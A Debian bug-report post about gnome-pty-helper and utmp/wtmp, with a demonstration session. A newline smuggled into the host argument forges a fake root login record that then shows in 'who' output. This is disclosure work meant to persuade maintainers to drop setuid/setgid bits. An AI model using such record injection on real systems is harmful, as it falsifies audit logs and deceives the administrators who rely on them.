Bug#330907: gnome-pty-helper foo

[Paul Szabo]

I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that

psz at savona:~$ exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz      pts/2        Oct 12 12:16 (XX)
root     tty01        Jan 01 02:03 (insecure.com)
psz      pts/1        Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+  Done                    exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')"
psz at savona:~$ 

should suitably freak them out.

Cheers,

Paul Szabo   psz at maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia